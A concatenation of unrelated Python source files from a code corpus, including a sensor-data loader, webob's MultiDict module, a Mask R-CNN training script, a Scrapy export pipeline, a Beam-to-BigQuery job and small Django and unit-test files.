directory structure bias! not shuffled!
This function knows the structure of the XSens dataset.
It will call the create_recording_frame function on every recording folder.
bp/data
dataset_01
activity_01
subject_01
recording_01
random_bullshit_folder
sensor_01.csv
sensor_02.csv
...
recording_02
...
subject_02
....
activity_02
...
data_set_02
...
"""
if not os.path.exists(dataset_path):
raise Exception("The dataset_path does not exist")
recordings: list[Recording] = []
# activity
activity_folder_names = get_subfolder_names(dataset_path)
for activity_folder_name in activity_folder_names:
activity_folder_path = os.path.join(dataset_path, activity_folder_name)
# subject
subject_folder_names = get_subfolder_names(activity_folder_path)
for subject_folder_name in subject_folder_names:
subject_folder_path = os.path.join(
activity_folder_path, subject_folder_name
)
# recording
recording_folder_names = get_subfolder_names(subject_folder_path)
for recording_folder_name in recording_folder_names:
if recording_folder_name.startswith("_"):
continue
recording_folder_path = os.path.join(
subject_folder_path, recording_folder_name
)
# print("Reading recording: {}".format(recording_folder_path))
recordings.append(
create_recording(
recording_folder_path, activity_folder_name, subject_folder_name
)
)
return recordings
def create_recording(
recording_folder_path: str, activity: str, subject: str
) -> Recording:
"""
Returns a recording
Gets a XSens recorind folder path, loops over sensor files, concatenates them, adds activity and subject, returns a recording
"""
raw_recording_frame = XSensRecordingReader.get_recording_frame(
recording_folder_path
)
time_column_name = "SampleTimeFine"
time_frame = raw_recording_frame[time_column_name]
sensor_frame = raw_recording_frame.drop([time_column_name], axis=1)
sensor_frame = reorder_sensor_columns(sensor_frame)
return Recording(sensor_frame, time_frame, activity, subject)
def reorder_sensor_columns(sensor_frame: pd.DataFrame) -> pd.DataFrame:
"""
reorders according to global settings
"""
column_suffix_dict = {}
for column_name in sensor_frame.columns:
ending = column_name[-2:]
if ending in column_suffix_dict:
column_suffix_dict[ending].append(column_name)
else:
column_suffix_dict[ending] = [column_name]
# assert list(column_suffix_dict.keys()) == settings.DATA_CONFIG.sensor_suffix_order ... only same elements
column_names_ordered = []
for sensor_suffix in settings.DATA_CONFIG.sensor_suffix_order:
column_names_ordered.extend(column_suffix_dict[sensor_suffix])
return sensor_frame[column_names_ordered]
| StarcoderdataPython |
74713 | from django.test import TestCase
from django_hats.bootstrap import Bootstrapper
class RolesTestCase(TestCase):
def setUp(self, *args, **kwargs):
'''Clears `Roles` cache for testing.
'''
for role in Bootstrapper.get_roles():
setattr(role, 'group', None)
return super(RolesTestCase, self).setUp(*args, **kwargs)
| StarcoderdataPython |
3303136 | <reponame>MiCHiLU/google_appengine_sdk
# (c) 2005 <NAME> and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
"""
Gives a multi-value dictionary object (MultiDict) plus several wrappers
"""
import cgi
import copy
import sys
from webob.util.dictmixin import DictMixin
try:
reversed
except NameError:
from webob.util.reversed import reversed
__all__ = ['MultiDict', 'UnicodeMultiDict', 'NestedMultiDict', 'NoVars']
class MultiDict(DictMixin):
"""
An ordered dictionary that can have multiple values for each key.
Adds the methods getall, getone, mixed, and add to the normal
dictionary interface.
"""
def __init__(self, *args, **kw):
if len(args) > 1:
raise TypeError(
"MultiDict can only be called with one positional argument")
if args:
if hasattr(args[0], 'iteritems'):
items = list(args[0].iteritems())
elif hasattr(args[0], 'items'):
items = args[0].items()
else:
items = list(args[0])
self._items = items
else:
self._items = []
self._items.extend(kw.iteritems())
#@classmethod
def view_list(cls, lst):
"""
Create a dict that is a view on the given list
"""
if not isinstance(lst, list):
raise TypeError(
"%s.view_list(obj) takes only actual list objects, not %r"
% (cls.__name__, lst))
obj = cls()
obj._items = lst
return obj
view_list = classmethod(view_list)
#@classmethod
def from_fieldstorage(cls, fs):
"""
Create a dict from a cgi.FieldStorage instance
"""
obj = cls()
if fs.list:
# fs.list can be None when there's nothing to parse
for field in fs.list:
if field.filename:
obj.add(field.name, field)
else:
obj.add(field.name, field.value)
return obj
from_fieldstorage = classmethod(from_fieldstorage)
def __getitem__(self, key):
for k, v in reversed(self._items):
if k == key:
return v
raise KeyError(key)
def __setitem__(self, key, value):
try:
del self[key]
except KeyError:
pass
self._items.append((key, value))
def add(self, key, value):
"""
Add the key and value, not overwriting any previous value.
"""
self._items.append((key, value))
def getall(self, key):
"""
Return a list of all values matching the key (may be an empty list)
"""
result = []
for k, v in self._items:
if key == k:
result.append(v)
return result
def getone(self, key):
"""
Get one value matching the key, raising a KeyError if multiple
values were found.
"""
v = self.getall(key)
if not v:
raise KeyError('Key not found: %r' % key)
if len(v) > 1:
raise KeyError('Multiple values match %r: %r' % (key, v))
return v[0]
def mixed(self):
"""
Returns a dictionary where the values are either single
values, or a list of values when a key/value appears more than
once in this dictionary. This is similar to the kind of
dictionary often used to represent the variables in a web
request.
"""
result = {}
multi = {}
for key, value in self.iteritems():
if key in result:
# We do this to not clobber any lists that are
# *actual* values in this dictionary:
if key in multi:
result[key].append(value)
else:
result[key] = [result[key], value]
multi[key] = None
else:
result[key] = value
return result
def dict_of_lists(self):
"""
Returns a dictionary where each key is associated with a
list of values.
"""
result = {}
for key, value in self.iteritems():
if key in result:
result[key].append(value)
else:
result[key] = [value]
return result
def __delitem__(self, key):
items = self._items
found = False
for i in range(len(items)-1, -1, -1):
if items[i][0] == key:
del items[i]
found = True
if not found:
raise KeyError(key)
def __contains__(self, key):
for k, v in self._items:
if k == key:
return True
return False
has_key = __contains__
def clear(self):
self._items = []
def copy(self):
return self.__class__(self)
def setdefault(self, key, default=None):
for k, v in self._items:
if key == k:
return v
self._items.append((key, default))
return default
def pop(self, key, *args):
if len(args) > 1:
raise TypeError, "pop expected at most 2 arguments, got "\
+ repr(1 + len(args))
for i in range(len(self._items)):
if self._items[i][0] == key:
v = self._items[i][1]
del self._items[i]
return v
if args:
return args[0]
else:
raise KeyError(key)
def popitem(self):
return self._items.pop()
def update(self, other=None, **kwargs):
if other is None:
pass
elif hasattr(other, 'items'):
self._items.extend(other.items())
elif hasattr(other, 'keys'):
for k in other.keys():
self._items.append((k, other[k]))
else:
for k, v in other:
self._items.append((k, v))
if kwargs:
self.update(kwargs)
def __repr__(self):
items = ', '.join(['(%r, %r)' % v for v in self.iteritems()])
return '%s([%s])' % (self.__class__.__name__, items)
def __len__(self):
return len(self._items)
##
## All the iteration:
##
def keys(self):
return [k for k, v in self._items]
def iterkeys(self):
for k, v in self._items:
yield k
__iter__ = iterkeys
def items(self):
return self._items[:]
def iteritems(self):
return iter(self._items)
def values(self):
return [v for k, v in self._items]
def itervalues(self):
for k, v in self._items:
yield v
class UnicodeMultiDict(DictMixin):
"""
A MultiDict wrapper that decodes returned values to unicode on the
fly. Decoding is not applied to assigned values.
The key/value contents are assumed to be ``str``/``strs`` or
``str``/``FieldStorages`` (as is returned by the ``paste.request.parse_``
functions).
Can optionally also decode keys when the ``decode_keys`` argument is
True.
``FieldStorage`` instances are cloned, and the clone's ``filename``
variable is decoded. Its ``name`` variable is decoded when ``decode_keys``
is enabled.
"""
def __init__(self, multi=None, encoding=None, errors='strict',
decode_keys=False):
self.multi = multi
if encoding is None:
encoding = sys.getdefaultencoding()
self.encoding = encoding
self.errors = errors
self.decode_keys = decode_keys
def _decode_key(self, key):
if self.decode_keys:
try:
key = key.decode(self.encoding, self.errors)
except AttributeError:
pass
return key
def _decode_value(self, value):
"""
Decode the specified value to unicode. Assumes value is a ``str`` or
`FieldStorage`` object.
``FieldStorage`` objects are specially handled.
"""
if isinstance(value, cgi.FieldStorage):
# decode FieldStorage's field name and filename
value = copy.copy(value)
if self.decode_keys:
value.name = value.name.decode(self.encoding, self.errors)
if value.filename:
value.filename = value.filename.decode(self.encoding,
self.errors)
else:
try:
value = value.decode(self.encoding, self.errors)
except AttributeError:
pass
return value
def __getitem__(self, key):
return self._decode_value(self.multi.__getitem__(key))
def __setitem__(self, key, value):
self.multi.__setitem__(key, value)
def add(self, key, value):
"""
Add the key and value, not overwriting any previous value.
"""
self.multi.add(key, value)
def getall(self, key):
"""
Return a list of all values matching the key (may be an empty list)
"""
return [self._decode_value(v) for v in self.multi.getall(key)]
def getone(self, key):
"""
Get one value matching the key, raising a KeyError if multiple
values were found.
"""
return self._decode_value(self.multi.getone(key))
def mixed(self):
"""
Returns a dictionary where the values are either single
values, or a list of values when a key/value appears more than
once in this dictionary. This is similar to the kind of
dictionary often used to represent the variables in a web
request.
"""
unicode_mixed = {}
for key, value in self.multi.mixed().iteritems():
if isinstance(value, list):
value = [self._decode_value(value) for value in value]
else:
value = self._decode_value(value)
unicode_mixed[self._decode_key(key)] = value
return unicode_mixed
def dict_of_lists(self):
"""
Returns a dictionary where each key is associated with a
list of values.
"""
unicode_dict = {}
for key, value in self.multi.dict_of_lists().iteritems():
value = [self._decode_value(value) for value in value]
unicode_dict[self._decode_key(key)] = value
return unicode_dict
def __delitem__(self, key):
self.multi.__delitem__(key)
def __contains__(self, key):
return self.multi.__contains__(key)
has_key = __contains__
def clear(self):
self.multi.clear()
def copy(self):
return UnicodeMultiDict(self.multi.copy(), self.encoding, self.errors)
def setdefault(self, key, default=None):
return self._decode_value(self.multi.setdefault(key, default))
def pop(self, key, *args):
return self._decode_value(self.multi.pop(key, *args))
def popitem(self):
k, v = self.multi.popitem()
return (self._decode_key(k), self._decode_value(v))
def __repr__(self):
items = ', '.join(['(%r, %r)' % v for v in self.items()])
return '%s([%s])' % (self.__class__.__name__, items)
def __len__(self):
return self.multi.__len__()
##
## All the iteration:
##
def keys(self):
return [self._decode_key(k) for k in self.multi.iterkeys()]
def iterkeys(self):
for k in self.multi.iterkeys():
yield self._decode_key(k)
__iter__ = iterkeys
def items(self):
return [(self._decode_key(k), self._decode_value(v)) for \
k, v in self.multi.iteritems()]
def iteritems(self):
for k, v in self.multi.iteritems():
yield (self._decode_key(k), self._decode_value(v))
def values(self):
return [self._decode_value(v) for v in self.multi.itervalues()]
def itervalues(self):
for v in self.multi.itervalues():
yield self._decode_value(v)
_dummy = object()
class NestedMultiDict(MultiDict):
"""
Wraps several MultiDict objects, treating it as one large MultiDict
"""
def __init__(self, *dicts):
self.dicts = dicts
def __getitem__(self, key):
for d in self.dicts:
value = d.get(key, _dummy)
if value is not _dummy:
return value
raise KeyError(key)
def _readonly(self, *args, **kw):
raise KeyError("NestedMultiDict objects are read-only")
__setitem__ = _readonly
add = _readonly
__delitem__ = _readonly
clear = _readonly
setdefault = _readonly
pop = _readonly
popitem = _readonly
update = _readonly
def getall(self, key):
result = []
for d in self.dicts:
result.extend(d.getall(key))
return result
# Inherited:
# getone
# mixed
# dict_of_lists
# copy
def __contains__(self, key):
for d in self.dicts:
if key in d:
return True
return False
has_key = __contains__
def __len__(self):
v = 0
for d in self.dicts:
v += len(d)
return v
def __nonzero__(self):
for d in self.dicts:
if d:
return True
return False
def items(self):
return list(self.iteritems())
def iteritems(self):
for d in self.dicts:
for item in d.iteritems():
yield item
def values(self):
return list(self.itervalues())
def itervalues(self):
for d in self.dicts:
for value in d.itervalues():
yield value
def keys(self):
return list(self.iterkeys())
def __iter__(self):
for d in self.dicts:
for key in d:
yield key
iterkeys = __iter__
class NoVars(object):
"""
Represents no variables; used when no variables
are applicable.
This is read-only
"""
def __init__(self, reason=None):
self.reason = reason or 'N/A'
def __getitem__(self, key):
raise KeyError("No key %r: %s" % (key, self.reason))
def __setitem__(self, *args, **kw):
raise KeyError("Cannot add variables: %s" % self.reason)
add = __setitem__
setdefault = __setitem__
update = __setitem__
def __delitem__(self, *args, **kw):
raise KeyError("No keys to delete: %s" % self.reason)
clear = __delitem__
pop = __delitem__
popitem = __delitem__
def get(self, key, default=None):
return default
def getall(self, key):
return []
def getone(self, key):
return self[key]
def mixed(self):
return {}
dict_of_lists = mixed
def __contains__(self, key):
return False
has_key = __contains__
def copy(self):
return self
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__,
self.reason)
def __len__(self):
return 0
def __cmp__(self, other):
return cmp({}, other)
def keys(self):
return []
def iterkeys(self):
return iter([])
__iter__ = iterkeys
items = keys
iteritems = iterkeys
values = keys
itervalues = iterkeys
__test__ = {
'general': """
>>> d = MultiDict(a=1, b=2)
>>> d['a']
1
>>> d.getall('c')
[]
>>> d.add('a', 2)
>>> d['a']
2
>>> d.getall('a')
[1, 2]
>>> d['b'] = 4
>>> d.getall('b')
[4]
>>> d.keys()
['a', 'a', 'b']
>>> d.items()
[('a', 1), ('a', 2), ('b', 4)]
>>> d.mixed()
{'a': [1, 2], 'b': 4}
>>> MultiDict([('a', 'b')], c=2)
MultiDict([('a', 'b'), ('c', 2)])
"""}
if __name__ == '__main__':
import doctest
doctest.testmod()
| StarcoderdataPython |
4802310 | <reponame>amazon-research/network-deconvolution-pp
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
r"""
Basic training script for PyTorch
"""
# Set up custom environment before nearly anything else is imported
# NOTE: this should be the first import (no not reorder)
from maskrcnn_benchmark.utils.env import setup_environment # noqa F401 isort:skip
import argparse
import os
import logging
import functools
import distutils.util
from collections import OrderedDict
import datetime
import torch
from maskrcnn_benchmark.config import cfg
from maskrcnn_benchmark.data import make_data_loader
from maskrcnn_benchmark.solver import make_lr_scheduler
from maskrcnn_benchmark.solver import make_optimizer
from maskrcnn_benchmark.engine.inference import inference
from maskrcnn_benchmark.engine.trainer import do_train
from maskrcnn_benchmark.modeling.detector import build_detection_model
from maskrcnn_benchmark.utils.checkpoint import DetectronCheckpointer
from maskrcnn_benchmark.utils.collect_env import collect_env_info
from maskrcnn_benchmark.utils.comm import synchronize, get_rank, is_main_process
from maskrcnn_benchmark.utils.imports import import_file
from maskrcnn_benchmark.utils.logger import setup_logger
from maskrcnn_benchmark.utils.miscellaneous import mkdir
from maskrcnn_benchmark.engine.tester import test
from maskrcnn_benchmark.utils.logger import format_step
#from dllogger import Logger, StdOutBackend, JSONStreamBackend, Verbosity
#import dllogger as DLLogger
import dllogger
from maskrcnn_benchmark.utils.logger import format_step
from torch.utils.tensorboard import SummaryWriter
# See if we can use apex.DistributedDataParallel instead of the torch default,
# and enable mixed-precision via apex.amp
try:
from apex import amp
use_amp = True
except ImportError:
print('Use APEX for multi-precision via apex.amp')
use_amp = False
try:
from apex.parallel import DistributedDataParallel as DDP
use_apex_ddp = True
except ImportError:
print('Use APEX for better performance')
use_apex_ddp = False
def test_and_exchange_map(tester, model, distributed, args):
results = tester(model=model, distributed=distributed, args=args)
# main process only
if is_main_process():
# Note: one indirection due to possibility of multiple test datasets, we only care about the first
# tester returns (parsed results, raw results). In our case, don't care about the latter
map_results, raw_results = results[0]
bbox_map = map_results.results["bbox"]['AP']
if cfg.MODEL.MASK_ON:
segm_map = map_results.results["segm"]['AP']
else:
segm_map = 0.
else:
bbox_map = 0.
segm_map = 0.
if distributed:
map_tensor = torch.tensor([bbox_map, segm_map], dtype=torch.float32, device=torch.device("cuda"))
torch.distributed.broadcast(map_tensor, 0)
bbox_map = map_tensor[0].item()
segm_map = map_tensor[1].item()
return bbox_map, segm_map
def mlperf_test_early_exit(iteration, iters_per_epoch, tester, model, distributed, min_bbox_map, min_segm_map,args):
if iteration > 0 and iteration % iters_per_epoch == 0:
epoch = iteration // iters_per_epoch
dllogger.log(step="PARAMETER", data={"eval_start": True})
bbox_map, segm_map = test_and_exchange_map(tester, model, distributed, args)
# necessary for correctness, this is for resuming the training
model.train()
dllogger.log(step=(iteration, epoch, ), data={"BBOX_mAP": bbox_map, "MASK_mAP": segm_map})
if is_main_process():
args.writer.add_scalar('BBOX_mAP', bbox_map, epoch)
args.writer.add_scalar('MASK_mAP', segm_map, epoch)
# terminating condition
if bbox_map >= min_bbox_map and segm_map >= min_segm_map:
dllogger.log(step="PARAMETER", data={"target_accuracy_reached": True})
return False#True #let's continue the training
return False
def train(cfg, local_rank, distributed, fp16, dllogger,args):
model = build_detection_model(cfg)
device = torch.device(cfg.MODEL.DEVICE)
model.to(device)
optimizer = make_optimizer(cfg, model)
scheduler = make_lr_scheduler(cfg, optimizer)
if use_amp:
# Initialize mixed-precision training
if fp16:
use_mixed_precision = True
else:
use_mixed_precision = cfg.DTYPE == "float16"
amp_opt_level = 'O1' if use_mixed_precision else 'O0'
model, optimizer = amp.initialize(model, optimizer, opt_level=amp_opt_level)
if distributed:
if use_apex_ddp:
model = DDP(model, delay_allreduce=True)
else:
model = torch.nn.parallel.DistributedDataParallel(
model, device_ids=[local_rank], output_device=local_rank,
# this should be removed if we update BatchNorm stats
broadcast_buffers=False,
)
if is_main_process():
print(model)
arguments = {}
arguments["iteration"] = 0
output_dir = cfg.OUTPUT_DIR
save_to_disk = get_rank() == 0
checkpointer = DetectronCheckpointer(
cfg, model, optimizer, scheduler, output_dir, save_to_disk
)
extra_checkpoint_data = checkpointer.load(cfg.MODEL.WEIGHT)
arguments.update(extra_checkpoint_data)
data_loader, iters_per_epoch = make_data_loader(
cfg,
is_train=True,
is_distributed=distributed,
start_iter=arguments["iteration"],
)
checkpoint_period = cfg.SOLVER.CHECKPOINT_PERIOD
args.iters_per_epoch=iters_per_epoch
# set the callback function to evaluate and potentially
# early exit each epoch
if cfg.PER_EPOCH_EVAL:
per_iter_callback_fn = functools.partial(
mlperf_test_early_exit,
iters_per_epoch=iters_per_epoch,
tester=functools.partial(test, cfg=cfg, dllogger=dllogger,args=args),
model=model,
distributed=distributed,
min_bbox_map=cfg.MIN_BBOX_MAP,
min_segm_map=cfg.MIN_MASK_MAP,
args=args)
else:
per_iter_callback_fn = None
do_train(
model,
data_loader,
optimizer,
scheduler,
checkpointer,
device,
checkpoint_period,
arguments,
use_amp,
cfg,
dllogger,
args,
per_iter_end_callback_fn=per_iter_callback_fn,
)
return model, iters_per_epoch
def test_model(cfg, model, distributed, iters_per_epoch, dllogger,args):
if distributed:
model = model.module
torch.cuda.empty_cache() # TODO check if it helps
iou_types = ("bbox",)
if cfg.MODEL.MASK_ON:
iou_types = iou_types + ("segm",)
output_folders = [None] * len(cfg.DATASETS.TEST)
dataset_names = cfg.DATASETS.TEST
if cfg.OUTPUT_DIR:
for idx, dataset_name in enumerate(dataset_names):
output_folder = os.path.join(cfg.OUTPUT_DIR, "inference", dataset_name)
mkdir(output_folder)
output_folders[idx] = output_folder
data_loaders_val = make_data_loader(cfg, is_train=False, is_distributed=distributed)
results = []
for output_folder, dataset_name, data_loader_val in zip(output_folders, dataset_names, data_loaders_val):
result = inference(
model,
data_loader_val,
dataset_name=dataset_name,
iou_types=iou_types,
box_only=cfg.MODEL.RPN_ONLY,
device=cfg.MODEL.DEVICE,
expected_results=cfg.TEST.EXPECTED_RESULTS,
expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,
output_folder=output_folder,
dllogger=dllogger,
args=args
)
synchronize()
results.append(result)
if is_main_process():
map_results, raw_results = results[0]
bbox_map = map_results.results["bbox"]['AP']
if cfg.MODEL.MASK_ON:
segm_map = map_results.results["segm"]['AP']
else:
segm_map=0.0
dllogger.log(step=(cfg.SOLVER.MAX_ITER, cfg.SOLVER.MAX_ITER / iters_per_epoch,), data={"BBOX_mAP": bbox_map, "MASK_mAP": segm_map})
dllogger.log(step=tuple(), data={"BBOX_mAP": bbox_map, "MASK_mAP": segm_map})
args.writer.add_scalar('BBOX_mAP', bbox_map, cfg.SOLVER.MAX_ITER / iters_per_epoch+1)
args.writer.add_scalar('MASK_mAP', segm_map, cfg.SOLVER.MAX_ITER / iters_per_epoch+1)
def save_path_formatter(args,cfg):
args.dataset=cfg.DATASETS.TRAIN[0]
args.lr=cfg.SOLVER.BASE_LR
args.batch_size=cfg.SOLVER.IMS_PER_BATCH
args.max_iter=cfg.SOLVER.MAX_ITER
args.backbone=cfg.MODEL.BACKBONE.CONV_BODY
args.use_nd=cfg.MODEL.ROI_BOX_HEAD.USE_DECONV
args.sync=cfg.MODEL.DECONV.SYNC
if cfg.MODEL.DECONV.RPN_NORM_TYPE!='none':
args.norm_type=cfg.MODEL.DECONV.RPN_NORM_TYPE
else:
args.norm_type=cfg.MODEL.DECONV.BOX_NORM_TYPE
args.sampling_stride=cfg.MODEL.DECONV.STRIDE
args.gn_box=cfg.MODEL.ROI_BOX_HEAD.USE_GN
args.gw_box=cfg.MODEL.ROI_BOX_HEAD.USE_GW
args.train_size=cfg.INPUT.MIN_SIZE_TRAIN
args.wd=cfg.SOLVER.WEIGHT_DECAY
args.accum_steps=cfg.SOLVER.ACCUMULATE_STEPS
args.pretrained=False
args.layerwise_norm=cfg.MODEL.DECONV.LAYERWISE_NORM
if cfg.MODEL.WEIGHT:
args.pretrained=True
args.block=cfg.MODEL.DECONV.BLOCK
args.block_fc=cfg.MODEL.DECONV.BLOCK_FC
args_dict = vars(args)
data_folder_name = args_dict['dataset']
folder_string = [data_folder_name]
key_map = OrderedDict()
key_map['backbone'] = ''
key_map['max_iter'] = 'max_iter'
key_map['lr']=''
key_map['batch_size']='bs'
key_map['use_nd']='nd'
key_map['gn_box']='gn'
key_map['gw_box']='gw'
key_map['block']='blk'
key_map['block_fc']='blk_fc'
key_map['sync']='sync'
key_map['sampling_stride']='stride'
key_map['norm_type']=''
key_map['train_size']='size'
key_map['pretrained']='pretrain'
key_map['wd']='wd'
key_map['layerwise_norm']='lwn'
#key_map['debug']='debug'
if cfg.SOLVER.ACCUMULATE_GRAD:
key_map['accum_steps']='cum'
for key, key2 in key_map.items():
value = args_dict[key]
if key2 is not '':
folder_string.append('{}:{}'.format(key2, value))
else:
folder_string.append('{}'.format(value))
save_path = ','.join(folder_string)
timestamp = datetime.datetime.now().strftime("%m-%d-%H:%M")
return os.path.join('checkpoints',save_path,timestamp)
def main():
parser = argparse.ArgumentParser(description="PyTorch Object Detection Training")
parser.add_argument(
"--config-file",
default="",
metavar="FILE",
help="path to config file",
type=str,
)
parser.add_argument("--local_rank", type=int, default=os.getenv('LOCAL_RANK', 0))
parser.add_argument("--max_steps", type=int, default=0, help="Override number of training steps in the config")
parser.add_argument("--skip-test", dest="skip_test", help="Do not test the final model",
action="store_true",)
parser.add_argument("--fp16", help="Mixed precision training", action="store_true")
parser.add_argument("--amp", help="Mixed precision training", action="store_true")
parser.add_argument('--skip_checkpoint', default=False, action='store_true', help="Whether to save checkpoints")
parser.add_argument("--json-summary", help="Out file for DLLogger", default="dllogger.out",
type=str,
)
parser.add_argument("--debug", type=distutils.util.strtobool, default=False, help="debug")
parser.add_argument("--eval-loss", action="store_true", default=False, help="evaluate loss(very buggy)")
parser.add_argument("--print-freq", type=int, default=100, help="print freq for tensorboard")
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
args.fp16 = args.fp16 or args.amp
num_gpus = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
args.distributed = num_gpus > 1
if args.distributed:
torch.cuda.set_device(args.local_rank)
torch.distributed.init_process_group(
backend="nccl", init_method="env://"
)
synchronize()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
if args.debug:
cfg.DEBUG=args.debug
# Redundant option - Override config parameter with command line input
if args.max_steps > 0:
cfg.SOLVER.MAX_ITER = args.max_steps
if args.skip_checkpoint:
cfg.SAVE_CHECKPOINT = False
cfg.freeze()
output_dir = cfg.OUTPUT_DIR
if output_dir:
mkdir(output_dir)
args.log_dir=save_path_formatter(args,cfg)
logger = setup_logger("maskrcnn_benchmark", output_dir, get_rank())
if is_main_process():
dllogger.init(backends=[dllogger.JSONStreamBackend(verbosity=dllogger.Verbosity.VERBOSE,
filename=args.json_summary),
dllogger.StdOutBackend(verbosity=dllogger.Verbosity.VERBOSE, step_format=format_step)])
else:
dllogger.init(backends=[])
dllogger.log(step="PARAMETER", data={"gpu_count":num_gpus})
# dllogger.log(step="PARAMETER", data={"environment_info": collect_env_info()})
dllogger.log(step="PARAMETER", data={"config_file": args.config_file})
with open(args.config_file, "r") as cf:
config_str = "\n" + cf.read()
dllogger.log(step="PARAMETER", data={"config":cfg})
if is_main_process():
args.writer = SummaryWriter(args.log_dir,flush_secs=30)
if args.fp16:
fp16 = True
else:
fp16 = False
model, iters_per_epoch = train(cfg, args.local_rank, args.distributed, fp16, dllogger, args)
if not args.skip_test:
#if not cfg.PER_EPOCH_EVAL:
test_model(cfg, model, args.distributed, iters_per_epoch, dllogger, args)
if __name__ == "__main__":
main()
dllogger.log(step=tuple(), data={})
dllogger.flush()
| StarcoderdataPython |
1687992 | from scrapy import signals
from scrapy.exporters import CsvItemExporter, XmlItemExporter
class DownloadPipeline(object):
@classmethod
def from_crawler(cls, crawler):
pipeline = cls()
crawler.signals.connect(pipeline.spider_opened, signals.spider_opened)
crawler.signals.connect(pipeline.spider_closed, signals.spider_closed)
return pipeline
def spider_opened(self, spider):
self.file = open('output.xlsx', 'w+b')
self.exporter = CsvItemExporter(self.file)
self.exporter.start_exporting()
def spider_closed(self, spider):
self.exporter.finish_exporting()
self.file.close()
def process_item(self, item, spider):
self.exporter.export_item(item)
return | StarcoderdataPython |
1687075 | #!/usr/bin/python3
from sanitise import *
def generate_orchestration(namespace, prefix, orchestration):
sane_prefix = sanitise_for_include_guard(prefix)
header_filename = '{}orchestration.hpp'.format(prefix)
with open(header_filename, 'w') as file:
header = \
'''#ifndef crocofix_libcrocofixdictionary_{}orchestration_hpp
#define crocofix_libcrocofixdictionary_{}orchestration_hpp
#include <libcrocofixdictionary/orchestration.hpp>
#include "{}messages.hpp"
#include "{}fields.hpp"
namespace {}
{{
'''.format(sane_prefix, sane_prefix, sane_prefix, sane_prefix, namespace)
file.write(header)
body = \
'''
class orchestration : public crocofix::dictionary::orchestration
{{
public:
orchestration()
: crocofix::dictionary::orchestration({}::messages(), {}::fields())
{{
}}
}};
'''.format(namespace, namespace)
file.write(body)
trailer = \
'''}
#endif
'''
file.write(trailer)
| StarcoderdataPython |
173147 | from __future__ import absolute_import
import logging
from io import StringIO
import argparse
import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions, StandardOptions, GoogleCloudOptions, SetupOptions
from apache_beam.io.gcp.internal.clients import bigquery
from dotenv import load_dotenv
load_dotenv()
def run(argv=None):
import re
import datetime
def string_to_dict(col_names, string_input):
"""
Transform each row of PCollection, which is one string from reading,
to dictionary which can be read by BigQuery
"""
values = re.split(',', re.sub(
'\r\n', '', re.sub(u'"', '', string_input)))
row = dict(zip(col_names, values))
return row
def milli_to_datetime(input):
output = input.copy()
dt = datetime.datetime.fromtimestamp(int(input['timestamp'])//1000)
output['timestamp'] = dt.strftime('%Y-%m-%d %H:%M:%S')
return output
def get_names_from_schema(input):
return map(lambda field: field['name'], input['fields'])
schema = {
'fields': [
{'name': 'timestamp', 'type': 'DATETIME', 'mode': 'REQUIRED'},
{'name': 'value', 'type': 'NUMERIC', 'mode': 'NULLABLE'}
]
}
# Command Line Options
parser = argparse.ArgumentParser()
parser.add_argument(
'--input',
help='Cloud Storage path to input file e.g. gs://cubems-data-pipeline.appspot.com/test.csv'
)
parser.add_argument(
'--output',
help='Output BigQuery table to write to e.g. set.table1'
)
args = parser.parse_args()
# Direct Runner options
options = PipelineOptions()
gcp_options = options.view_as(GoogleCloudOptions)
gcp_options.project = 'cubems-data-pipeline'
gcp_options.region = 'asia-east1'
gcp_options.job_name = 'testjob'
gcp_options.temp_location = 'gs://cubems-data-pipeline.appspot.com/temp_location'
options.view_as(StandardOptions).runner = 'DataflowRunner'
p = beam.Pipeline(options=options)
(p
| 'Read CSV' >> beam.io.ReadFromText(args.input, skip_header_lines=1)
| 'Transform string to dictionary' >> beam.Map(lambda s: string_to_dict(get_names_from_schema(schema), s))
| 'Transform string to valid timestamp' >> beam.Map(lambda s: milli_to_datetime(s))
| 'Write to BigQuery' >> beam.io.WriteToBigQuery(
args.output,
schema=schema,
create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,
write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND)
)
p.run()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
run()
| StarcoderdataPython |
166260 | <reponame>starsep/NewsBlur<gh_stars>1000+
from apps.reader.models import UserSubscription, UserSubscriptionFolders, Feature
from django.contrib import admin
admin.site.register(UserSubscription)
admin.site.register(UserSubscriptionFolders)
admin.site.register(Feature) | StarcoderdataPython |
90957 | from django.conf import settings
# Map of mode -> processor config
# {
# 'js': {
# 'processor': 'damn.processors.ScriptProcessor',
# 'aliases': {},
# },
# }
PROCESSORS = getattr(settings, "DAMN_PROCESSORS", {})
# File extension -> mode name
MODE_MAP = getattr(settings, "DAMN_MODE_MAP", {})
MODE_ORDER = getattr(settings, "DAMN_MODE_ORDER", ["css", "js",])
| StarcoderdataPython |
1700448 | import unittest
from dan import DanModel, QuestionDataset
import numpy as np
import torch
import torch.nn as nn
text1 = {'text':torch.LongTensor([[2, 3]]).view(1, 2), 'len': torch.FloatTensor([2])}
text2 = {'text':torch.LongTensor([[1, 3, 4, 2, 1, 0]]).view(1, 6), 'len': torch.FloatTensor([5])}
text3 = {'text':torch.LongTensor([[2, 3, 1], [3, 4, 0]]), 'len': torch.FloatTensor([3, 2])}
text4 = {'text':torch.LongTensor([[1, 0, 0, 0, 0], [2, 4, 4, 3, 1], [3, 4, 1, 0, 0]]), 'len': torch.FloatTensor([1, 5, 3])}
class TestSequenceFunctions(unittest.TestCase):
def setUp(self):
self.toy_dan_model = DanModel(2, 5, emb_dim=2, n_hidden_units=2)
self.wide_dan_model = DanModel(1, 1, emb_dim=4, n_hidden_units=1)
self.toy_dan_model.eval()
weight_matrix = torch.tensor([[0, 0], [0.1, 0.9], [0.3, 0.4], [0.5, 0.5], [0.6, 0.2]])
self.toy_dan_model.embeddings.weight.data.copy_(weight_matrix)
l1_weight = torch.tensor([[0.2, 0.9], [-0.1, 0.7]])
self.toy_dan_model.linear1.weight.data.copy_(l1_weight)
